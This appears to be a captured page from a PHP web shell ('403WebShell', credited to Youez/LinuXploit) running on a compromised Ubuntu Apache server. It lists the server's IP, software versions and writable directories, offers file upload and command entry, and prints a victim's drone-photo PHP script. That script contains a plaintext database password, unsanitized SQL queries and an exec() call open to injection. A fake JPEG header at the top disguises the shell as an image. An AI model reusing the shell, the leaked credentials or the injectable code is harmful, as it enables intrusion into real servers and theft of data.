????JFIF??x?x????'403WebShell
403Webshell
Server IP : 79.136.114.73  /  Your IP : 18.222.153.166
Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f
System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64
User : www-data ( 33)
PHP Version : 5.5.9-1ubuntu4.29
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/appsrv.astacus.se/XMP/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /var/www/appsrv.astacus.se/XMP/create_xmp.php
<?php

    $projectid = $_GET['projectid'];

    if($projectid != ""){
        $mysqli = new mysqli("www.astacus.se", "carlhoffstedt", "Astacus2020!", "dronemap");
        $sql = "SELECT * FROM tblDroneProjects WHERE ProjectId = ".$projectid;
        
        $found = false;
        $result = $mysqli->query($sql);
	    while($obj = $result->fetch_object()){  
            $found = true;
        }
        
            if($found == true){
 
                $dir    = '/var/www/appsrv.astacus.se/XMP/data/'.$projectid.'/';
                $files = scandir($dir);
                
                   $sql = "DELETE FROM tblDronePhotos WHERE DroneProjectsId = ".$projectid;
                $result = $mysqli->query($sql);
                foreach ($files as &$value) {
                    if(strlen($value) > 2 && strpos($value,"JPG") > 1){
                        $command = 'exiv2 -e X extract "'.$dir.$value.'"';

                      //  echo($command ."<br>");
                        exec($command, $output, $return_var);
            
                        $xmp = substr($dir.$value,0,strlen($dir.$value)-4).".xmp";
                        //echo($xmp);
                    
                       $fh = fopen($xmp,'r');
                        $all_lines = "";
                        while ($line = fgets($fh)) {
                             $all_lines .=$line;
                        }
                        fclose($fh);
                        
                       // echo( $all_lines);
                        
                        $sql = "INSERT INTO tblDronePhotos VALUES(null,$projectid,'".$value."','".$all_lines."' )";

                        $result = $mysqli->query($sql);
                    
                    }
                }
            }else{
          //      echo("Not in DB");
            }
            
        }else {
        //  echo("Enter ?projectid=[ID]");
        }


  $sql = "SELECT * FROM tblDronePhotos WHERE DroneProjectsId = ".$projectid;
        
     //   echo($sql);
        $found = false;
        $result = $mysqli->query($sql);
        $x = 0;
	    while($obj = $result->fetch_object()){  
           $XMP = $obj->XMP;
            $GpsLatitude += substr($XMP,strpos($XMP,"GpsLatitude")+14,8);
            $GpsLongitude += substr($XMP,strpos($XMP,"GpsLongitude")+15,8);
           if($GpsLongitude == ""){
               $GpsLongitude += substr($XMP,strpos($XMP,"GpsLongtitude")+16,8);
           }
            
            $x++;
        }
         $GpsLatitude =  $GpsLatitude / $x;
         $GpsLongitude =  $GpsLongitude / $x;
            $GPS =  $GpsLatitude.", ".  $GpsLongitude ;
        
 $sql = "UPDATE tblDroneProjects SET CenterLatLong = '".$GPS."' WHERE ProjectId = $projectid ";
            $mysqli->query($sql);

//echo($sql);

header("location: viewer/?project=$projectid");

?>

Youez - 2016 - github.com/yon3zu
LinuXploit